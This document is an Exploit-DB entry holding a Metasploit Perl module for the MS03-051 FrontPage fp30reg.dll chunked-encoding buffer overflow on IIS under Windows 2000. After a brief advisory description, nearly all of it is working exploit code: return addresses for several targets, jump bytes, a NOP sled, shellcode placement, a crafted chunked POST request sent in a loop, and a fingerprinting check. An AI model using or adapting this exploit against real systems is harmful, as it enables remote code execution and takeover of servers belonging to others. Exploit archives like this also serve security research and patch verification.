Microsoft Visual Studio RAD Support - Remote Buffer Overflow (MS03-051) (Metasploit)

EDB-ID:

20951




Platform:

Windows

Date:

2001-06-21


source: https://www.securityfocus.com/bid/2906/info
 
Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context. 

package Msf::Exploit::frontpage_fp30reg_chunked;
use base "Msf::Exploit";
use strict;

my $advanced = { }; 

my $info =
{
    'Name'  => 'Frontpage fp30reg.dll Chunked Encoding',
    'Version'  => '$Revision: 1.19 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 0,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 80],
                    'SSL'   => [0, 'BOOL', 'Use SSL'],
                },

    'Payload' => {
                 'Space'  => 1024,
                 'BadChars'  => "\x00+&=%\x0a\x0d\x20",
               },
    
    'Description'  => qq{
        This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular modules works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
    },
              
    'Refs'  =>  [  
                    'http://www.osvdb.org/577',
		            'http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx'
                ],
    'DefaultTarget' => 0,
    'Targets' => [
                   ['Windows 2000 SP0-SP3',  0x6c38a4d0],   # from mfc42.dll
                   ['Windows 2000 07/22/02', 0x67d44eb1],   # from fp30reg.dll 07/22/2002
                   ['Windows 2000 10/06/99', 0x67d4665d],   # from fp30reg.dll 10/06/1999
                 ],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Exploit {
    my $self = shift;

    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   =$self->GetVar('EncodedPayload')->Payload;
  
    my @targets;
    my @offsets;
    my $pad;

    my $ret = defined($target_idx) ? ($self->Targets->[ $target_idx ]->[1]) : $self->Targets->[0]->[1];
    my $pattern = Pex::PatternCreate(0xDEAD);
    
    my $count = 0;
    while (1)
    {
        if ($count % 3 == 0)
        {
            $self->PrintLine("[*] Refreshing remote process...");
            my $res = $self->Check();
            $count = 0;
        }

        substr($pattern, 128, 4, pack("V", $ret));
        substr($pattern, 264, 4, pack("V", $ret));
        substr($pattern, 160, 7, "\x2d\xff\xfe\xff\xff" . "\xff\xe0");
        substr($pattern, 280, 512, "\x90" x 512);
        substr($pattern, 792, length($shellcode), $shellcode);

        my $request;
        $request  = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
        $request .= "Host: $target_host:$target_port\r\n";
        $request .= "Transfer-Encoding: chunked\r\n";
        $request .= "\r\n";
        $request .= "DEAD\r\n";
        $request .= $pattern . "\r\n";
        $request .= "0\r\n";

        my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
        if (! $s->Tcp($target_host, $target_port))
        {
            $self->FatalError("Could not connect: " . $s->GetError());
            return;
        }

        $self->PrintLine("[*] Sending exploit request...");
        $s->Send($request);
        sleep(1);
        $s->Close();
        $count++;
    }
    return;
}

sub Check {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    
    my $getreq = "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n".
                 "Host: $target_host:$target_port\r\n\r\n";
 
    my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
    
    if (! $s)
    {
       $self->PrintLine("[*] Could not create the socket");
       return(0);
    }
    
    if (! $s->Tcp($target_host, $target_port))
    {
        $self->PrintLine("[*] Could not connect: " . $s->GetError());
        return(0);
    }
    
    $s->Send($getreq);
    my $res = $s->Recv(-1, 10);
    $s->Close();
    
    if ($res !~ /501 Not Implemented/)
    {
        $self->PrintLine("[*] Frontpage component was not found");
        return(0);
    }

    $self->PrintLine("[*] Frontpage component found");
    return(1);

}